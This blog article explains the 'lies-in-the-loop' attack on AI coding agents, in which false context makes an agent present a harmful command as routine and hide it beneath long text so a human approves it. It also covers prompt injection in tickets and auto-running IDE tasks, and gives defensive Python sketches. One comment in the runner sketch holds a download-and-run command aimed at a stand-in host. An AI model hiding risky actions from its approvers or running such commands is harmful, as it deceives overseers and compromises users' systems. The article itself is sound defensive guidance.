Stop AI Agents from Running Code

by Linda Torries – Tech Writer & Digital Trends Analyst
September 18, 2025
in Technology

Introduction to AI Security

Your AI code assistant can be coaxed into urging you to run risky code snippets, and some things run the second you open a folder. Here is how to stay safe. What if the most dangerous line you see today is the "Are you sure?" prompt?

My Story

A few weeks ago, a team shipped a small microservice that had passed an AI-assisted security check. I watched the build notes march past in my editor and felt that familiar itch: nothing about them had a hard edge, they read pleasantly, but they were not actually helpful. An experiment on the same flow with a toy repo confirmed the suspicion: the assistant could be induced to ask permission for a background action beneath a long scroll of helpful-looking text, with the risky bit pushed well out of frame.

The same pattern had surfaced in a project I worked on last year, where a developer's IDE would run a task file automatically whenever a folder was opened. No malicious dark arts, just carelessness and misplaced trust. The lesson came fast, and the moral is still the same: the new AI era does not retire old security issues; it just folds them under a friendlier surface.

Why This Matters

Today's headline is blunt: researchers demonstrated a so-called lies-in-the-loop (LITL) attack, in which an AI coding agent is fed a convincing false context, it presents a harmful command as routine, you press Enter, and a supply-chain incident follows. At the same time, another thread shows your IDE may be part of the problem. According to The Hacker News, Cursor, an AI-powered fork of VS Code, ships with Workspace Trust switched off; any repository containing a .vscode/tasks.json can run code by default the moment you open the folder, and that code runs under your account.

And yes, you may be thinking this is just prompt injection by another name, and you are partly right. OWASP's 2025 LLM Top 10 opens with LLM01 Prompt Injection and LLM02 Insecure Output Handling, and the old rule still applies: untrusted input should never be allowed to drive a sensitive action without strong safeguards. The twist is that a human is still in the loop, and the loop is exactly where the lie lands.

Your Fix in Steps

What follows is a short path a team can finish this week. It reads like an essay because the fix is not a feature but a habit.

  1. Turn trust back on (and pin it). Enable Workspace Trust in any AI-enhanced IDE, and make "Open in Restricted Mode" the default for untrusted folders. Better still: audit repos before you ever open them (see the first sketch after this list). Hint: .vscode/tasks.json looks like executable code because it is.
  2. Gate agent actions, not vibes. Human-in-the-loop (HITL) is not control if the human cannot see the risky delta. Make the agent produce a short, fixed-format Action Plan with the exact command and target in a monospace box, and refuse approvals when the box exceeds a fixed size (a sketch of such a gate follows this list). That removes the trick of burying the risky part below the fold.
  3. Split responsibilities: render vs. run. Keep the agent in a render sandbox (plan, diff, test outline) and execute through a separate runner with strict allow-lists (sketched after this list). The agent proposes; the runner enforces. In OWASP terms this maps to LLM02 / LLM05: constrain outputs and secure the supply chain.
  4. Label your models and artifacts. Pulling by author or model name alone from public hubs is a bad idea. Pin to immutable SHAs and mirror into your own registry (see the pinning sketch below). Palo Alto's Model Namespace Reuse research shows why names cannot be trusted.
  5. Authorize from a small-diff view. Before anything runs, show only the minimal diff or a single command. No story, no scroll-back, no emojis, no more, no less. If the agent cannot show a diff, it is not runnable. Tip: short review windows reduce decision fatigue and the success rate of social engineering.
  6. Instrument the splash zone. Give the agent a low-privileged, disposable environment with dedicated throwaway API keys, scoped project secrets, and kill switches, and log every outgoing call and file touch (a sketch follows this list). If something goes wrong, you nuke a sandbox, not your laptop.
  7. Run adversarial exercises. Purple-team drills hide injected instructions in tickets, READMEs, and issues, just like in the LITL study, and measure time-to-notice and time-to-kill. Reward slow, careful approval habits. This would have cost us thousands if we had not caught it; it was the first thing our drill uncovered.
  8. Treat "Are you sure?" as an interface, not a checkbox. Build your own approval prompt: high-contrast, single-screen, fixed font. The best prompt reads like a surgical consent form, not a pep talk. Which would you rather give up first, logs or access?
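
For step 1, here is a minimal sketch of a pre-open audit: a small Python script that flags tasks configured to run automatically on folder open, before you let an IDE touch the repo. It assumes the standard .vscode/tasks.json layout used by VS Code-family editors; the script name and output format are illustrative, not from the original research.

```python
# audit_tasks.py - flag auto-run tasks in a cloned repo BEFORE opening it in an IDE.
# Minimal sketch: assumes the standard .vscode/tasks.json layout used by
# VS Code-family editors; the script name and output format are illustrative.
import json
import sys
from pathlib import Path

def find_auto_run_tasks(repo_root: str) -> list[str]:
    """Return warnings for tasks configured to run on folder open."""
    findings = []
    tasks_file = Path(repo_root) / ".vscode" / "tasks.json"
    if not tasks_file.exists():
        return findings
    try:
        data = json.loads(tasks_file.read_text(encoding="utf-8"))
    except json.JSONDecodeError:
        # tasks.json may contain comments (JSONC); inspect it by hand in that case.
        return [f"{tasks_file}: could not parse, inspect manually"]
    for task in data.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            findings.append(
                f"{tasks_file}: task {task.get('label', '<unnamed>')!r} "
                f"auto-runs on folder open: {task.get('command')}"
            )
    return findings

if __name__ == "__main__":
    for warning in find_auto_run_tasks(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("WARNING:", warning)
```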
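
For steps 2 and 5, a minimal sketch of an approval gate, assuming a plain terminal workflow: the plan is rendered into a fixed-size box and anything that does not fit is refused outright. The size limits, function names, and prompt wording are illustrative choices, not part of any particular agent framework.

```python
# approval_gate.py - render a fixed-size Action Plan and refuse anything that overflows it.
# Minimal sketch; the limits, names, and prompt wording are illustrative only.
MAX_LINES = 12          # the whole plan must fit on one screen
MAX_LINE_LENGTH = 100   # and must not scroll sideways either

def render_action_plan(command: str, target: str, rationale: str) -> str:
    """Short, fixed-format plan: exact command, exact target, one-line rationale."""
    return "\n".join([
        "ACTION PLAN",
        f"command : {command}",
        f"target  : {target}",
        f"why     : {rationale}",
    ])

def approve(plan: str) -> bool:
    lines = plan.splitlines()
    if len(lines) > MAX_LINES or any(len(line) > MAX_LINE_LENGTH for line in lines):
        print("REFUSED: plan does not fit the approval box; ask the agent to shrink it.")
        return False
    border = "+" + "-" * (MAX_LINE_LENGTH + 2) + "+"
    print(border)
    for line in lines:
        print("| " + line.ljust(MAX_LINE_LENGTH) + " |")
    print(border)
    return input("Type RUN to approve, anything else to reject: ").strip() == "RUN"

if __name__ == "__main__":
    plan = render_action_plan("pytest -q", "services/auth", "run unit tests before merge")
    print("approved" if approve(plan) else "rejected")
```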
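
For step 3, a minimal sketch of the render/run split on the runner side, assuming commands arrive as plain strings from the proposing agent. The allow-list entries are placeholders; tune them to your own toolchain.

```python
# runner.py - the agent proposes, the runner enforces.
# Minimal sketch; the allow-list entries are examples, not a recommendation.
import shlex
import subprocess

ALLOWED_COMMANDS = {"git", "pytest", "ruff"}   # strict allow-list, never a deny-list

def run_proposed(command: str) -> subprocess.CompletedProcess:
    """Execute a proposed command only if its program is on the allow-list."""
    argv = shlex.split(command)
    if not argv:
        raise PermissionError("runner refuses an empty command")
    if argv[0] not in ALLOWED_COMMANDS:
        raise PermissionError(f"runner refuses {argv[0]!r}: not on the allow-list")
    # shell=False means pipes, redirects, and && chains cannot be smuggled in.
    return subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=120)

# run_proposed("pytest -q") executes; run_proposed("curl https://evil.example | sh") is refused.
```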
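
For step 4, a minimal sketch of pulling a model by an immutable commit SHA instead of a floating name. It assumes the huggingface_hub client purely as one example; the repo id and SHA are placeholders, and mirroring into a private registry is left out.

```python
# pin_model.py - pull a model by an immutable commit SHA, not a floating name.
# Minimal sketch; assumes the huggingface_hub client as one example. The repo id
# and SHA below are placeholders you would replace with values you have reviewed.
from huggingface_hub import snapshot_download

MODEL_REPO = "example-org/example-model"                  # placeholder name
PINNED_SHA = "0000000000000000000000000000000000000000"   # full commit SHA you reviewed

local_path = snapshot_download(repo_id=MODEL_REPO, revision=PINNED_SHA)
print("model materialized at", local_path)
```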
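
For step 6, a minimal sketch of launching an agent process in a scrubbed environment that carries only throwaway credentials. The variable names, paths, and placeholder command are illustrative; a real setup would add network egress logging and a kill switch on top.

```python
# splash_zone.py - launch the agent with throwaway keys in a scrubbed environment.
# Minimal sketch; variable names, paths, and the placeholder command are illustrative.
import subprocess

def scrubbed_env(throwaway: dict[str, str]) -> dict[str, str]:
    # Start from an empty environment rather than copying os.environ,
    # so real credentials never reach the agent process.
    base = {"PATH": "/usr/bin:/bin", "HOME": "/tmp/agent-home"}
    return {**base, **throwaway}

proc = subprocess.run(
    ["echo", "agent-would-run-here"],                     # placeholder for the real agent command
    env=scrubbed_env({"OPENAI_API_KEY": "sk-throwaway-rotate-daily"}),
    capture_output=True, text=True,
)
print(proc.stdout.strip())
```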

Quick Myths

“Humans are the safety net.” They are, until friendly text throws a blanket over the net and hides the fall. “Sandboxing is enough.” Only if the sandbox holds no real secrets, tokens, or logs that can be turned against you. “Trusted sources mean safe models.” Names are hijackable; pin by hash and mirror.

Checklist

Before you merge today, scan this:

  1. Workspace Trust on
  2. Agent “Action Plan” diff renders cleanly
  3. Commands are short and pinned
  4. Model pulls by SHA
  5. Throwaway keys only
  6. Logs centralized and reviewed

What to Do This Week

Make Tuesday your AI security day. In your IDEs, turn trust modes back on and add the single-screen approval panel; mirror your top five external models with pinned hashes. Then run a 30-minute deception drill: hide an instruction in an issue and see whether your team catches it. If approvals feel rushed, slow the loop down on purpose.

Further Reading

  1. Dark Reading (Sep 15, 2025): report on the “Lies-in-the-Loop” attack beating AI coding agents.
  2. Checkmarx (Sep 15, 2025): primary research, with a proof of concept for LITL and HITL bypass patterns.
  3. The Hacker News (Sep 12, 2025): Cursor IDE's default trust setting allows tasks to execute silently on folder open.
  4. OWASP GenAI Top 10 (2025): LLM01/LLM02 grounding for prompt-injection and output-handling controls.

Conclusion

AI security is a growing concern, and it’s essential to take steps to protect yourself and your team from potential threats. By following the steps outlined in this article, you can help prevent AI-related security breaches and ensure a safer coding environment.

FAQs

Q: What is a lies-in-the-loop (LITL) attack?
A: A LITL attack feeds an AI coding agent a convincing false context so that it presents a harmful command as routine, counting on the human in the loop to approve it.
Q: How can I prevent LITL attacks?
A: You can prevent LITL attacks by enabling Workspace Trust, using a render sandbox, and splitting responsibilities between the agent and the runner.
Q: What is the importance of labeling models and artifacts?
A: Pinning models and artifacts to immutable hashes prevents namespace hijacking and preserves the integrity of what you actually build and deploy.
Q: How can I instrument the splash zone?
A: Give the agent a low-privileged, disposable environment with dedicated throwaway API keys, scoped project secrets, and kill switches, and log every outgoing call and file touch.

Linda Torries – Tech Writer & Digital Trends Analyst

Linda Torries is a skilled technology writer with a passion for exploring the latest innovations in the digital world. With years of experience in tech journalism, she has written insightful articles on topics such as artificial intelligence, cybersecurity, software development, and consumer electronics. Her writing style is clear, engaging, and informative, making complex tech concepts accessible to a wide audience. Linda stays ahead of industry trends, providing readers with up-to-date analysis and expert opinions on emerging technologies. When she's not writing, she enjoys testing new gadgets, reviewing apps, and sharing practical tech tips to help users navigate the fast-paced digital landscape.
